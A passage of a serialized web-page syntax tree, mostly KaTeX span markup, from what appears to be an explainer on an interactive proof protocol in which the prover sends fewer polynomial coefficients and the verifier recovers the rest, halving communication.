":112766,"style":281},[184],[],{"type":26,"tag":137,"props":112769,"children":112771},{"className":112770},[151],[112772,112777,112782,112786,112791],{"type":26,"tag":137,"props":112773,"children":112776},{"className":112774,"style":112775},[156],"height:0.6667em;vertical-align:-0.0833em;",[],{"type":26,"tag":137,"props":112778,"children":112780},{"className":112779},[169,170],[112781],{"type":32,"value":41},{"type":26,"tag":137,"props":112783,"children":112785},{"className":112784,"style":348},[184],[],{"type":26,"tag":137,"props":112787,"children":112789},{"className":112788},[353],[112790],{"type":32,"value":356},{"type":26,"tag":137,"props":112792,"children":112794},{"className":112793,"style":348},[184],[],{"type":26,"tag":137,"props":112796,"children":112798},{"className":112797},[151],[112799,112803,112808],{"type":26,"tag":137,"props":112800,"children":112802},{"className":112801,"style":95563},[156],[],{"type":26,"tag":137,"props":112804,"children":112806},{"className":112805},[169,170],[112807],{"type":32,"value":2832},{"type":26,"tag":137,"props":112809,"children":112811},{"className":112810,"style":97651},[169,170],[112812],{"type":32,"value":8718},{"type":32,"value":112814}," has only two coefficients. Since the verifier knows ",{"type":26,"tag":130,"props":112816,"children":112818},{"className":112817},[133,134],[112819],{"type":26,"tag":137,"props":112820,"children":112822},{"className":112821},[140],[112823],{"type":26,"tag":137,"props":112824,"children":112826},{"className":112825,"ariaHidden":146},[145],[112827,112920,113013],{"type":26,"tag":137,"props":112828,"children":112830},{"className":112829},[151],[112831,112835,112892,112897,112902,112907,112911,112916],{"type":26,"tag":137,"props":112832,"children":112834},{"className":112833,"style":157},[156],[],{"type":26,"tag":137,"props":112836,"children":112838},{"className":112837},[169],[112839,112844],{"type":26,"tag":137,"props":112840,"children":112842},{"className":112841,"style":190},[169,170],[112843],{"type":32,"value":111874},{"type":26,"tag":137,"props":112845,"children":112847},{"className":112846},[236],[112848],{"type":26,"tag":137,"props":112849,"children":112851},{"className":112850},[241,417],[112852,112881],{"type":26,"tag":137,"props":112853,"children":112855},{"className":112854},[246],[112856,112876],{"type":26,"tag":137,"props":112857,"children":112859},{"className":112858,"style":556},[251],[112860],{"type":26,"tag":137,"props":112861,"children":112862},{"style":819},[112863,112867],{"type":26,"tag":137,"props":112864,"children":112866},{"className":112865,"style":262},[261],[],{"type":26,"tag":137,"props":112868,"children":112870},{"className":112869},[267,268,269,270],[112871],{"type":26,"tag":137,"props":112872,"children":112874},{"className":112873},[169,170,270],[112875],{"type":32,"value":506},{"type":26,"tag":137,"props":112877,"children":112879},{"className":112878},[453],[112880],{"type":32,"value":456},{"type":26,"tag":137,"props":112882,"children":112884},{"className":112883},[246],[112885],{"type":26,"tag":137,"props":112886,"children":112888},{"className":112887,"style":464},[251],[112889],{"type":26,"tag":137,"props":112890,"children":112891},{},[],{"type":26,"tag":137,"props":112893,"children":112895},{"className":112894},[162],[112896],{"type":32,"value":165},{"type":26,"tag":137,"props":112898,"children":112900},{"className":112899},[169],[112901],{"type":32,"value":1817},{"type":26,"tag":137,"props":112903,"children":112905},{"className":112904},[197],[112906],{"type":32,"value":200},{"type":26,"tag":137,"props":112908,"children":112910},{"className":112909,"style":348},[184],[],{"type":26,"tag":137,"props":112912,"children":112914},{"className":112913},[353],[112915],{"type":32,"value":356},{"type":26,"tag":137,"props":112917,"children":112919},{"className":112918,"style":348},[184],[],{"type":26,"tag":137,"props":112921,"children":112923},{"className":112922},[151],[112924,112928,112985,112990,112995,113000,113004,113009],{"type":26,"tag":137,"props":112925,"children":112927},{"className":112926,"style":157},[156],[],{"type":26,"tag":137,"props":112929,"children":112931},{"className":112930},[169],[112932,112937],{"type":26,"tag":137,"props":112933,"children":112935},{"className":112934,"style":190},[169,170],[112936],{"type":32,"value":111874},{"type":26,"tag":137,"props":112938,"children":112940},{"className":112939},[236],[112941],{"type":26,"tag":137,"props":112942,"children":112944},{"className":112943},[241,417],[112945,112974],{"type":26,"tag":137,"props":112946,"children":112948},{"className":112947},[246],[112949,112969],{"type":26,"tag":137,"props":112950,"children":112952},{"className":112951,"style":556},[251],[112953],{"type":26,"tag":137,"props":112954,"children":112955},{"style":819},[112956,112960],{"type":26,"tag":137,"props":112957,"children":112959},{"className":112958,"style":262},[261],[],{"type":26,"tag":137,"props":112961,"children":112963},{"className":112962},[267,268,269,270],[112964],{"type":26,"tag":137,"props":112965,"children":112967},{"className":112966},[169,170,270],[112968],{"type":32,"value":506},{"type":26,"tag":137,"props":112970,"children":112972},{"className":112971},[453],[112973],{"type":32,"value":456},{"type":26,"tag":137,"props":112975,"children":112977},{"className":112976},[246],[112978],{"type":26,"tag":137,"props":112979,"children":112981},{"className":112980,"style":464},[251],[112982],{"type":26,"tag":137,"props":112983,"children":112984},{},[],{"type":26,"tag":137,"props":112986,"children":112988},{"className":112987},[162],[112989],{"type":32,"value":165},{"type":26,"tag":137,"props":112991,"children":112993},{"className":112992},[169],[112994],{"type":32,"value":878},{"type":26,"tag":137,"props":112996,"children":112998},{"className":112997},[197],[112999],{"type":32,"value":200},{"type":26,"tag":137,"props":113001,"children":113003},{"className":113002,"style":281},[184],[],{"type":26,"tag":137,"props":113005,"children":113007},{"className":113006},[286],[113008],{"type":32,"value":289},{"type":26,"tag":137,"props":113010,"children":113012},{"className":113011,"style":281},[184],[],{"type":26,"tag":137,"props":113014,"children":113016},{"className":113015},[151],[113017,113022],{"type":26,"tag":137,"props":113018,"children":113021},{"className":113019,"style":113020},[156],"height:0.8917em;vertical-align:-0.2083em;",[],{"type":26,"tag":137,"props":113023,"children":113025},{"className":113024},[169],[113026,113031],{"type":26,"tag":137,"props":113027,"children":113029},{"className":113028,"style":1517},[169,170],[113030],{"type":32,"value":1520},{"type":26,"tag":137,"props":113032,"children":113034},{"className":113033},[236],[113035],{"type":26,"tag":137,"props":113036,"children":113038},{"className":113037},[241,417],[113039,113083],{"type":26,"tag":137,"props":113040,"children":113042},{"className":113041},[246],[113043,113078],{"type":26,"tag":137,"props":113044,"children":113046},{"className":113045,"style":556},[251],[113047],{"type":26,"tag":137,"props":113048,"children":113050},{"style":113049},"top:-2.55em;margin-left:-0.0813em;margin-right:0.05em;",[113051,113055],{"type":26,"tag":137,"props":113052,"children":113054},{"className":113053,"style":262},[261],[],{"type":26,"tag":137,"props":113056,"children":113058},{"className":113057},[267,268,269,270],[113059],{"type":26,"tag":137,"props":113060,"children":113062},{"className":113061},[169,270],[113063,113068,113073],{"type":26,"tag":137,"props":113064,"children":113066},{"className":113065},[169,170,270],[113067],{"type":32,"value":506},{"type":26,"tag":137,"props":113069,"children":113071},{"className":113070},[353,270],[113072],{"type":32,"value":1935},{"type":26,"tag":137,"props":113074,"children":113076},{"className":113075},[169,270],[113077],{"type":32,"value":878},{"type":26,"tag":137,"props":113079,"children":113081},{"className":113080},[453],[113082],{"type":32,"value":456},{"type":26,"tag":137,"props":113084,"children":113086},{"className":113085},[246],[113087],{"type":26,"tag":137,"props":113088,"children":113091},{"className":113089,"style":113090},[251],"height:0.2083em;",[113092],{"type":26,"tag":137,"props":113093,"children":113094},{},[],{"type":32,"value":113096}," (the previous claim), we have:",{"type":26,"tag":35,"props":113098,"children":113099},{},[113100],{"type":26,"tag":130,"props":113101,"children":113103},{"className":113102},[133,134],[113104],{"type":26,"tag":137,"props":113105,"children":113107},{"className":113106},[140],[113108],{"type":26,"tag":137,"props":113109,"children":113111},{"className":113110,"ariaHidden":146},[145],[113112,113138,113169,113200,113301,113327,113419],{"type":26,"tag":137,"props":113113,"children":113115},{"className":113114},[151],[113116,113120,113125,113129,113134],{"type":26,"tag":137,"props":113117,"children":113119},{"className":113118,"style":112775},[156],[],{"type":26,"tag":137,"props":113121,"children":113123},{"className":113122},[169,170],[113124],{"type":32,"value":41},{"type":26,"tag":137,"props":113126,"children":113128},{"className":113127,"style":348},[184],[],{"type":26,"tag":137,"props":113130,"children":113132},{"className":113131},[353],[113133],{"type":32,"value":356},{"type":26,"tag":137,"props":113135,"children":113137},{"className":113136,"style":348},[184],[],{"type":26,"tag":137,"props":113139,"children":113141},{"className":113140},[151],[113142,113146,113151,113156,113160,113165],{"type":26,"tag":137,"props":113143,"children":113145},{"className":113144,"style":157},[156],[],{"type":26,"tag":137,"props":113147,"children":113149},{"className":113148},[162],[113150],{"type":32,"value":165},{"type":26,"tag":137,"props":113152,"children":113154},{"className":113153},[169,170],[113155],{"type":32,"value":41},{"type":26,"tag":137,"props":113157,"children":113159},{"className":113158,"style":348},[184],[],{"type":26,"tag":137,"props":113161,"children":113163},{"className":113162},[353],[113164],{"type":32,"value":356},{"type":26,"tag":137,"props":113166,"children":113168},{"className":113167,"style":348},[184],[],{"type":26,"tag":137,"props":113170,"children":113172},{"className":113171},[151],[113173,113177,113182,113187,113191,113196],{"type":26,"tag":137,"props":113174,"children":113176},{"className":113175,"style":157},[156],[],{"type":26,"tag":137,"props":113178,"children":113180},{"className":113179},[169,170],[113181],{"type":32,"value":2832},{"type":26,"tag":137,"props":113183,"children":113185},{"className":113184},[197],[113186],{"type":32,"value":200},{"type":26,"tag":137,"props":113188,"children":113190},{"className":113189,"style":281},[184],[],{"type":26,"tag":137,"props":113192,"children":113194},{"className":113193},[286],[113195],{"type":32,"value":289},{"type":26,"tag":137,"props":113197,"children":113199},{"className":113198,"style":281},[184],[],{"type":26,"tag":137,"props":113201,"children":113203},{"className":113202},[151],[113204,113208,113279,113283,113287,113293,113297],{"type":26,"tag":137,"props":113205,"children":113207},{"className":113206,"style":113020},[156],[],{"type":26,"tag":137,"props":113209,"children":113211},{"className":113210},[169],[113212,113217],{"type":26,"tag":137,"props":113213,"children":113215},{"className":113214,"style":1517},[169,170],[113216],{"type":32,"value":1520},{"type":26,"tag":137,"props":113218,"children":113220},{"className":113219},[236],[113221],{"type":26,"tag":137,"props":113222,"children":113224},{"className":113223},[241,417],[113225,113268],{"type":26,"tag":137,"props":113226,"children":113228},{"className":113227},[246],[113229,113263],{"type":26,"tag":137,"props":113230,"children":113232},{"className":113231,"style":556},[251],[113233],{"type":26,"tag":137,"props":113234,"children":113235},{"style":113049},[113236,113240],{"type":26,"tag":137,"props":113237,"children":113239},{"className":113238,"style":262},[261],[],{"type":26,"tag":137,"props":113241,"children":113243},{"className":113242},[267,268,269,270],[113244],{"type":26,"tag":137,"props":113245,"children":113247},{"className":113246},[169,270],[113248,113253,113258],{"type":26,"tag":137,"props":113249,"children":113251},{"className":113250},[169,170,270],[113252],{"type":32,"value":506},{"type":26,"tag":137,"props":113254,"children":113256},{"className":113255},[353,270],[113257],{"type":32,"value":1935},{"type":26,"tag":137,"props":113259,"children":113261},{"className":113260},[169,270],[113262],{"type":32,"value":878},{"type":26,"tag":137,"props":113264,"children":113266},{"className":113265},[453],[113267],{"type":32,"value":456},{"type":26,"tag":137,"props":113269,"children":113271},{"className":113270},[246],[113272],{"type":26,"tag":137,"props":113273,"children":113275},{"className":113274,"style":113090},[251],[113276],{"type":26,"tag":137,"props":113277,"children":113278},{},[],{"type":26,"tag":137,"props":113280,"children":113282},{"className":113281,"style":281},[184],[],{"type":26,"tag":137,"props":113284,"children":113286},{"className":113285,"style":281},[184],[],{"type":26,"tag":137,"props":113288,"children":113290},{"className":113289},[286],[113291],{"type":32,"value":113292},"⟹",{"type":26,"tag":137,"props":113294,"children":113296},{"className":113295,"style":281},[184],[],{"type":26,"tag":137,"props":113298,"children":113300},{"className":113299,"style":281},[184],[],{"type":26,"tag":137,"props":113302,"children":113304},{"className":113303},[151],[113305,113309,113314,113318,113323],{"type":26,"tag":137,"props":113306,"children":113308},{"className":113307,"style":95563},[156],[],{"type":26,"tag":137,"props":113310,"children":113312},{"className":113311},[169,170],[113313],{"type":32,"value":2832},{"type":26,"tag":137,"props":113315,"children":113317},{"className":113316,"style":281},[184],[],{"type":26,"tag":137,"props":113319,"children":113321},{"className":113320},[286],[113322],{"type":32,"value":289},{"type":26,"tag":137,"props":113324,"children":113326},{"className":113325,"style":281},[184],[],{"type":26,"tag":137,"props":113328,"children":113330},{"className":113329},[151],[113331,113335,113406,113410,113415],{"type":26,"tag":137,"props":113332,"children":113334},{"className":113333,"style":113020},[156],[],{"type":26,"tag":137,"props":113336,"children":113338},{"className":113337},[169],[113339,113344],{"type":26,"tag":137,"props":113340,"children":113342},{"className":113341,"style":1517},[169,170],[113343],{"type":32,"value":1520},{"type":26,"tag":137,"props":113345,"children":113347},{"className":113346},[236],[113348],{"type":26,"tag":137,"props":113349,"children":113351},{"className":113350},[241,417],[113352,113395],{"type":26,"tag":137,"props":113353,"children":113355},{"className":113354},[246],[113356,113390],{"type":26,"tag":137,"props":113357,"children":113359},{"className":113358,"style":556},[251],[113360],{"type":26,"tag":137,"props":113361,"children":113362},{"style":113049},[113363,113367],{"type":26,"tag":137,"props":113364,"children":113366},{"className":113365,"style":262},[261],[],{"type":26,"tag":137,"props":113368,"children":113370},{"className":113369},[267,268,269,270],[113371],{"type":26,"tag":137,"props":113372,"children":113374},{"className":113373},[169,270],[113375,113380,113385],{"type":26,"tag":137,"props":113376,"children":113378},{"className":113377},[169,170,270],[113379],{"type":32,"value":506},{"type":26,"tag":137,"props":113381,"children":113383},{"className":113382},[353,270],[113384],{"type":32,"value":1935},{"type":26,"tag":137,"props":113386,"children":113388},{"className":113387},[169,270],[113389],{"type":32,"value":878},{"type":26,"tag":137,"props":113391,"children":113393},{"className":113392},[453],[113394],{"type":32,"value":456},{"type":26,"tag":137,"props":113396,"children":113398},{"className":113397},[246],[113399],{"type":26,"tag":137,"props":113400,"children":113402},{"className":113401,"style":113090},[251],[113403],{"type":26,"tag":137,"props":113404,"children":113405},{},[],{"type":26,"tag":137,"props":113407,"children":113409},{"className":113408,"style":348},[184],[],{"type":26,"tag":137,"props":113411,"children":113413},{"className":113412},[353],[113414],{"type":32,"value":1935},{"type":26,"tag":137,"props":113416,"children":113418},{"className":113417,"style":348},[184],[],{"type":26,"tag":137,"props":113420,"children":113422},{"className":113421},[151],[113423,113427,113432],{"type":26,"tag":137,"props":113424,"children":113426},{"className":113425,"style":368},[156],[],{"type":26,"tag":137,"props":113428,"children":113430},{"className":113429},[169],[113431],{"type":32,"value":277},{"type":26,"tag":137,"props":113433,"children":113435},{"className":113434},[169,170],[113436],{"type":32,"value":41},{"type":26,"tag":35,"props":113438,"children":113439},{},[113440,113442,113560,113562,113587],{"type":32,"value":113441},"So the prover only sends ",{"type":26,"tag":130,"props":113443,"children":113445},{"className":113444},[133,134],[113446],{"type":26,"tag":137,"props":113447,"children":113449},{"className":113448},[140],[113450],{"type":26,"tag":137,"props":113451,"children":113453},{"className":113452,"ariaHidden":146},[145],[113454,113480],{"type":26,"tag":137,"props":113455,"children":113457},{"className":113456},[151],[113458,113462,113467,113471,113476],{"type":26,"tag":137,"props":113459,"children":113461},{"className":113460,"style":1542},[156],[],{"type":26,"tag":137,"props":113463,"children":113465},{"className":113464},[169,170],[113466],{"type":32,"value":41},{"type":26,"tag":137,"props":113468,"children":113470},{"className":113469,"style":281},[184],[],{"type":26,"tag":137,"props":113472,"children":113474},{"className":113473},[286],[113475],{"type":32,"value":289},{"type":26,"tag":137,"props":113477,"children":113479},{"className":113478,"style":281},[184],[],{"type":26,"tag":137,"props":113481,"children":113483},{"className":113482},[151],[113484,113488,113545,113550,113555],{"type":26,"tag":137,"props":113485,"children":113487},{"className":113486,"style":157},[156],[],{"type":26,"tag":137,"props":113489,"children":113491},{"className":113490},[169],[113492,113497],{"type":26,"tag":137,"props":113493,"children":113495},{"className":113494,"style":190},[169,170],[113496],{"type":32,"value":111874},{"type":26,"tag":137,"props":113498,"children":113500},{"className":113499},[236],[113501],{"type":26,"tag":137,"props":113502,"children":113504},{"className":113503},[241,417],[113505,113534],{"type":26,"tag":137,"props":113506,"children":113508},{"className":113507},[246],[113509,113529],{"type":26,"tag":137,"props":113510,"children":113512},{"className":113511,"style":556},[251],[113513],{"type":26,"tag":137,"props":113514,"children":113515},{"style":819},[113516,113520],{"type":26,"tag":137,"props":113517,"children":113519},{"className":113518,"style":262},[261],[],{"type":26,"tag":137,"props":113521,"children":113523},{"className":113522},[267,268,269,270],[113524],{"type":26,"tag":137,"props":113525,"children":113527},{"className":113526},[169,170,270],[113528],{"type":32,"value":506},{"type":26,"tag":137,"props":113530,"children":113532},{"className":113531},[453],[113533],{"type":32,"value":456},{"type":26,"tag":137,"props":113535,"children":113537},{"className":113536},[246],[113538],{"type":26,"tag":137,"props":113539,"children":113541},{"className":113540,"style":464},[251],[113542],{"type":26,"tag":137,"props":113543,"children":113544},{},[],{"type":26,"tag":137,"props":113546,"children":113548},{"className":113547},[162],[113549],{"type":32,"value":165},{"type":26,"tag":137,"props":113551,"children":113553},{"className":113552},[169],[113554],{"type":32,"value":1817},{"type":26,"tag":137,"props":113556,"children":113558},{"className":113557},[197],[113559],{"type":32,"value":200},{"type":32,"value":113561},", and the verifier recovers ",{"type":26,"tag":130,"props":113563,"children":113565},{"className":113564},[133,134],[113566],{"type":26,"tag":137,"props":113567,"children":113569},{"className":113568},[140],[113570],{"type":26,"tag":137,"props":113571,"children":113573},{"className":113572,"ariaHidden":146},[145],[113574],{"type":26,"tag":137,"props":113575,"children":113577},{"className":113576},[151],[113578,113582],{"type":26,"tag":137,"props":113579,"children":113581},{"className":113580,"style":95563},[156],[],{"type":26,"tag":137,"props":113583,"children":113585},{"className":113584},[169,170],[113586],{"type":32,"value":2832},{"type":32,"value":113588},". This saves 50% on communication costs.",{"type":26,"tag":35,"props":113590,"children":113591},{},[113592],{"type":32,"value":113593},"The next claim in the chain is",{"type":26,"tag":35,"props":113595,"children":113596},{},[113597],{"type":26,"tag":130,"props":113598,"children":113600},{"className":113599},[133,134],[113601],{"type":26,"tag":137,"props":113602,"children":113604},{"className":113603},[140],[113605],{"type":26,"tag":137,"props":113606,"children":113608},{"className":113607,"ariaHidden":146},[145],[113609,113688,113833,113859,113885,113963,113989,114086,114122,114200,114236,114324,114416],{"type":26,"tag":137,"props":113610,"children":113612},{"className":113611},[151],[113613,113618,113675,113679,113684],{"type":26,"tag":137,"props":113614,"children":113617},{"className":113615,"style":113616},[156],"height:0.8333em;vertical-align:-0.15em;",[],{"type":26,"tag":137,"props":113619,"children":113621},{"className":113620},[169],[113622,113627],{"type":26,"tag":137,"props":113623,"children":113625},{"className":113624,"style":1517},[169,170],[113626],{"type":32,"value":1520},{"type":26,"tag":137,"props":113628,"children":113630},{"className":113629},[236],[113631],{"type":26,"tag":137,"props":113632,"children":113634},{"className":113633},[241,417],[113635,113664],{"type":26,"tag":137,"props":113636,"children":113638},{"className":113637},[246],[113639,113659],{"type":26,"tag":137,"props":113640,"children":113642},{"className":113641,"style":556},[251],[113643],{"type":26,"tag":137,"props":113644,"children":113645},{"style":113049},[113646,113650],{"type":26,"tag":137,"props":113647,"children":113649},{"className":113648,"style":262},[261],[],{"type":26,"tag":137,"props":113651,"children":113653},{"className":113652},[267,268,269,270],[113654],{"type":26,"tag":137,"props":113655,"children":113657},{"className":113656},[169,170,270],[113658],{"type":32,"value":506},{"type":26,"tag":137,"props":113660,"children":113662},{"className":113661},[453],[113663],{"type":32,"value":456},{"type":26,"tag":137,"props":113665,"children":113667},{"className":113666},[246],[113668],{"type":26,"tag":137,"props":113669,"children":113671},{"className":113670,"style":464},[251],[113672],{"type":26,"tag":137,"props":113673,"children":113674},{},[],{"type":26,"tag":137,"props":113676,"children":113678},{"className":113677,"style":281},[184],[],{"type":26,"tag":137,"props":113680,"children":113682},{"className":113681},[286],[113683],{"type":32,"value":289},{"type":26,"tag":137,"props":113685,"children":113687},{"className":113686,"style":281},[184],[],{"type":26,"tag":137,"props":113689,"children":113691},{"className":113690},[151],[113692,113696,113753,113758,113815,113820,113824,113829],{"type":26,"tag":137,"props":113693,"children":113695},{"className":113694,"style":157},[156],[],{"type":26,"tag":137,"props":113697,"children":113699},{"className":113698},[169],[113700,113705],{"type":26,"tag":137,"props":113701,"children":113703},{"className":113702,"style":190},[169,170],[113704],{"type":32,"value":111874},{"type":26,"tag":137,"props":113706,"children":113708},{"className":113707},[236],[113709],{"type":26,"tag":137,"props":113710,"children":113712},{"className":113711},[241,417],[113713,113742],{"type":26,"tag":137,"props":113714,"children":113716},{"className":113715},[246],[113717,113737],{"type":26,"tag":137,"props":113718,"children":113720},{"className":113719,"style":556},[251],[113721],{"type":26,"tag":137,"props":113722,"children":113723},{"style":819},[113724,113728],{"type":26,"tag":137,"props":113725,"children":113727},{"className":113726,"style":262},[261],[],{"type":26,"tag":137,"props":113729,"children":113731},{"className":113730},[267,268,269,270],[113732],{"type":26,"tag":137,"props":113733,"children":113735},{"className":113734},[169,170,270],[113736],{"type":32,"value":506},{"type":26,"tag":137,"props":113738,"children":113740},{"className":113739},[453],[113741],{"type":32,"value":456},{"type":26,"tag":137,"props":113743,"children":113745},{"className":113744},[246],[113746],{"type":26,"tag":137,"props":113747,"children":113749},{"className":113748,"style":464},[251],[113750],{"type":26,"tag":137,"props":113751,"children":113752},{},[],{"type":26,"tag":137,"props":113754,"children":113756},{"className":113755},[162],[113757],{"type":32,"value":165},{"type":26,"tag":137,"props":113759,"children":113761},{"className":113760},[169],[113762,113767],{"type":26,"tag":137,"props":113763,"children":113765},{"className":113764,"style":621},[169,170],[113766],{"type":32,"value":624},{"type":26,"tag":137,"props":113768,"children":113770},{"className":113769},[236],[113771],{"type":26,"tag":137,"props":113772,"children":113774},{"className":113773},[241,417],[113775,113804],{"type":26,"tag":137,"props":113776,"children":113778},{"className":113777},[246],[113779,113799],{"type":26,"tag":137,"props":113780,"children":113782},{"className":113781,"style":556},[251],[113783],{"type":26,"tag":137,"props":113784,"children":113785},{"style":643},[113786,113790],{"type":26,"tag":137,"props":113787,"children":113789},{"className":113788,"style":262},[261],[],{"type":26,"tag":137,"props":113791,"children":113793},{"className":113792},[267,268,269,270],[113794],{"type":26,"tag":137,"props":113795,"children":113797},{"className":113796},[169,170,270],[113798],{"type":32,"value":506},{"type":26,"tag":137,"props":113800,"children":113802},{"className":113801},[453],[113803],{"type":32,"value":456},{"type":26,"tag":137,"props":113805,"children":113807},{"className":113806},[246],[113808],{"type":26,"tag":137,"props":113809,"children":113811},{"className":113810,"style":464},[251],[113812],{"type":26,"tag":137,"props":113813,"children":113814},{},[],{"type":26,"tag":137,"props":113816,"children":113818},{"className":113817},[197],[113819],{"type":32,"value":200},{"type":26,"tag":137,"props":113821,"children":113823},{"className":113822,"style":281},[184],[],{"type":26,"tag":137,"props":113825,"children":113827},{"className":113826},[286],[113828],{"type":32,"value":289},{"type":26,"tag":137,"props":113830,"children":113832},{"className":113831,"style":281},[184],[],{"type":26,"tag":137,"props":113834,"children":113836},{"className":113835},[151],[113837,113841,113846,113850,113855],{"type":26,"tag":137,"props":113838,"children":113840},{"className":113839,"style":112775},[156],[],{"type":26,"tag":137,"props":113842,"children":113844},{"className":113843},[169,170],[113845],{"type":32,"value":41},{"type":26,"tag":137,"props":113847,"children":113849},{"className":113848,"style":348},[184],[],{"type":26,"tag":137,"props":113851,"children":113853},{"className":113852},[353],[113854],{"type":32,"value":356},{"type":26,"tag":137,"props":113856,"children":113858},{"className":113857,"style":348},[184],[],{"type":26,"tag":137,"props":113860,"children":113862},{"className":113861},[151],[113863,113867,113872,113876,113881],{"type":26,"tag":137,"props":113864,"children":113866},{"className":113865,"style":95563},[156],[],{"type":26,"tag":137,"props":113868,"children":113870},{"className":113869},[169,170],[113871],{"type":32,"value":2832},{"type":26,"tag":137,"props":113873,"children":113875},{"className":113874,"style":348},[184],[],{"type":26,"tag":137,"props":113877,"children":113879},{"className":113878},[353],[113880],{"type":32,"value":2172},{"type":26,"tag":137,"props":113882,"children":113884},{"className":113883,"style":348},[184],[],{"type":26,"tag":137,"props":113886,"children":113888},{"className":113887},[151],[113889,113893,113950,113954,113959],{"type":26,"tag":137,"props":113890,"children":113892},{"className":113891,"style":612},[156],[],{"type":26,"tag":137,"props":113894,"children":113896},{"className":113895},[169],[113897,113902],{"type":26,"tag":137,"props":113898,"children":113900},{"className":113899,"style":621},[169,170],[113901],{"type":32,"value":624},{"type":26,"tag":137,"props":113903,"children":113905},{"className":113904},[236],[113906],{"type":26,"tag":137,"props":113907,"children":113909},{"className":113908},[241,417],[113910,113939],{"type":26,"tag":137,"props":113911,"children":113913},{"className":113912},[246],[113914,113934],{"type":26,"tag":137,"props":113915,"children":113917},{"className":113916,"style":556},[251],[113918],{"type":26,"tag":137,"props":113919,"children":113920},{"style":643},[113921,113925],{"type":26,"tag":137,"props":113922,"children":113924},{"className":113923,"style":262},[261],[],{"type":26,"tag":137,"props":113926,"children":113928},{"className":113927},[267,268,269,270],[113929],{"type":26,"tag":137,"props":113930,"children":113932},{"className":113931},[169,170,270],[113933],{"type":32,"value":506},{"type":26,"tag":137,"props":113935,"children":113937},{"className":113936},[453],[113938],{"type":32,"value":456},{"type":26,"tag":137,"props":113940,"children":113942},{"className":113941},[246],[113943],{"type":26,"tag":137,"props":113944,"children":113946},{"className":113945,"style":464},[251],[113947],{"type":26,"tag":137,"props":113948,"children":113949},{},[],{"type":26,"tag":137,"props":113951,"children":113953},{"className":113952,"style":281},[184],[],{"type":26,"tag":137,"props":113955,"children":113957},{"className":113956},[286],[113958],{"type":32,"value":289},{"type":26,"tag":137,"props":113960,"children":113962},{"className":113961,"style":281},[184],[],{"type":26,"tag":137,"props":113964,"children":113966},{"className":113965},[151],[113967,113971,113976,113980,113985],{"type":26,"tag":137,"props":113968,"children":113970},{"className":113969,"style":112775},[156],[],{"type":26,"tag":137,"props":113972,"children":113974},{"className":113973},[169,170],[113975],{"type":32,"value":41},{"type":26,"tag":137,"props":113977,"children":113979},{"className":113978,"style":348},[184],[],{"type":26,"tag":137,"props":113981,"children":113983},{"className":113982},[353],[113984],{"type":32,"value":356},{"type":26,"tag":137,"props":113986,"children":113988},{"className":113987,"style":348},[184],[],{"type":26,"tag":137,"props":113990,"children":113992},{"className":113991},[151],[113993,113997,114002,114073,114077,114082],{"type":26,"tag":137,"props":113994,"children":113996},{"className":113995,"style":157},[156],[],{"type":26,"tag":137,"props":113998,"children":114000},{"className":113999},[162],[114001],{"type":32,"value":165},{"type":26,"tag":137,"props":114003,"children":114005},{"className":114004},[169],[114006,114011],{"type":26,"tag":137,"props":114007,"children":114009},{"className":114008,"style":1517},[169,170],[114010],{"type":32,"value":1520},{"type":26,"tag":137,"props":114012,"children":114014},{"className":114013},[236],[114015],{"type":26,"tag":137,"props":114016,"children":114018},{"className":114017},[241,417],[114019,114062],{"type":26,"tag":137,"props":114020,"children":114022},{"className":114021},[246],[114023,114057],{"type":26,"tag":137,"props":114024,"children":114026},{"className":114025,"style":556},[251],[114027],{"type":26,"tag":137,"props":114028,"children":114029},{"style":113049},[114030,114034],{"type":26,"tag":137,"props":114031,"children":114033},{"className":114032,"style":262},[261],[],{"type":26,"tag":137,"props":114035,"children":114037},{"className":114036},[267,268,269,270],[114038],{"type":26,"tag":137,"props":114039,"children":114041},{"className":114040},[169,270],[114042,114047,114052],{"type":26,"tag":137,"props":114043,"children":114045},{"className":114044},[169,170,270],[114046],{"type":32,"value":506},{"type":26,"tag":137,"props":114048,"children":114050},{"className":114049},[353,270],[114051],{"type":32,"value":1935},{"type":26,"tag":137,"props":114053,"children":114055},{"className":114054},[169,270],[114056],{"type":32,"value":878},{"type":26,"tag":137,"props":114058,"children":114060},{"className":114059},[453],[114061],{"type":32,"value":456},{"type":26,"tag":137,"props":114063,"children":114065},{"className":114064},[246],[114066],{"type":26,"tag":137,"props":114067,"children":114069},{"className":114068,"style":113090},[251],[114070],{"type":26,"tag":137,"props":114071,"children":114072},{},[],{"type":26,"tag":137,"props":114074,"children":114076},{"className":114075,"style":348},[184],[],{"type":26,"tag":137,"props":114078,"children":114080},{"className":114079},[353],[114081],{"type":32,"value":1935},{"type":26,"tag":137,"props":114083,"children":114085},{"className":114084,"style":348},[184],[],{"type":26,"tag":137,"props":114087,"children":114089},{"className":114088},[151],[114090,114094,114099,114104,114109,114113,114118],{"type":26,"tag":137,"props":114091,"children":114093},{"className":114092,"style":157},[156],[],{"type":26,"tag":137,"props":114095,"children":114097},{"className":114096},[169],[114098],{"type":32,"value":277},{"type":26,"tag":137,"props":114100,"children":114102},{"className":114101},[169,170],[114103],{"type":32,"value":41},{"type":26,"tag":137,"props":114105,"children":114107},{"className":114106},[197],[114108],{"type":32,"value":200},{"type":26,"tag":137,"props":114110,"children":114112},{"className":114111,"style":348},[184],[],{"type":26,"tag":137,"props":114114,"children":114116},{"className":114115},[353],[114117],{"type":32,"value":2172},{"type":26,"tag":137,"props":114119,"children":114121},{"className":114120,"style":348},[184],[],{"type":26,"tag":137,"props":114123,"children":114125},{"className":114124},[151],[114126,114130,114187,114191,114196],{"type":26,"tag":137,"props":114127,"children":114129},{"className":114128,"style":612},[156],[],{"type":26,"tag":137,"props":114131,"children":114133},{"className":114132},[169],[114134,114139],{"type":26,"tag":137,"props":114135,"children":114137},{"className":114136,"style":621},[169,170],[114138],{"type":32,"value":624},{"type":26,"tag":137,"props":114140,"children":114142},{"className":114141},[236],[114143],{"type":26,"tag":137,"props":114144,"children":114146},{"className":114145},[241,417],[114147,114176],{"type":26,"tag":137,"props":114148,"children":114150},{"className":114149},[246],[114151,114171],{"type":26,"tag":137,"props":114152,"children":114154},{"className":114153,"style":556},[251],[114155],{"type":26,"tag":137,"props":114156,"children":114157},{"style":643},[114158,114162],{"type":26,"tag":137,"props":114159,"children":114161},{"className":114160,"style":262},[261],[],{"type":26,"tag":137,"props":114163,"children":114165},{"className":114164},[267,268,269,270],[114166],{"type":26,"tag":137,"props":114167,"children":114169},{"className":114168},[169,170,270],[114170],{"type":32,"value":506},{"type":26,"tag":137,"props":114172,"children":114174},{"className":114173},[453],[114175],{"type":32,"value":456},{"type":26,"tag":137,"props":114177,"children":114179},{"